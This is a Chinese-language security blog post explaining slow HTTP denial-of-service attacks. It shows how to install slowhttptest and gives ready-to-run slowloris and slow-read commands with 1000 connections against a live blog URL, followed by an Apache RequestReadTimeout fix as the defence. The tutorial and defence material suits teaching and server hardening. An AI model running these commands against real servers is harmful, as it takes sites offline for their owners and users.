文章总结： 本文介绍了慢速HTTP攻击，它通过保持连接消耗服务器资源。文章讲解了如何使用slowhttptest工具进行slowloris和slowread攻击测试，并提供了在Apache服务器上通过配置RequestReadTimeout模块来防御此类攻击的具体方法，以增强服务器安全性。 综合评分： 85 文章分类： WEB安全,漏洞分析,渗透测试,安全工具,漏洞POC

浅谈慢速DOS攻击与防御

原创

大表哥吆

kali笔记

2025年12月19日 12:15 甘肃

SlowHTTPTest是一款对服务器进行慢攻击的测试软件，所谓的慢攻击就是相对于cc或者DDoS的快而言的，并不是只有量大速度快才能把服务器搞挂，使用慢攻击有时候也能到达同一效果。

slowhttptest包含了之前几种慢攻击的攻击方式，包括slowloris, Slow HTTP POST, Slow Read attack等。那么这些慢攻击工具的原理就是想办法让服务器等待，当服务器在保持连接等待时，自然就消耗了资源。

在kali中安装

在kali中，我们可以用apt命令直接进行安装。

apt-get install slowhttptest

其他系统安装

tar -xzvf slowhttptest-x.x.tar.gz
cd slowhttptest-x.x
./configure --prefix=PREFIX
make
sudo make install

查看帮助

slowhttptest -h

使用示例

警告！！！以下仅在测试环境进行实验，坚决反对一切危害网络安全的行为。slowloris模式：

slowhttptest -c 1000 -H -i 10 -r 200 -t GET -u https://blog.bbskali.cn/index.html -x 24 -p 3

当service available显示为NO时。证明已经成功。

Slow Read模式：

slowhttptest -c 1000 -X -r 1000 -w 10 -y 20 -n 5 -z 32 -u https://blog.bbskali.cn/index.html

如何防御

这里我们以apache为例 修改apache的配置文件httpd.conf

首先启用reqtimeout_module modules模块。默认已经启动，如果没有启动删掉前面的#号就行了。

然后，添加下面代码

<IfModule reqtimeout_module>
&nbsp; &nbsp; RequestReadTimeout header=5-40,MinRate=500 body=20,MinRate=500
</IfModule>

更多精彩文章 欢迎关注我们

查看原文：《浅谈慢速DOS攻击与防御》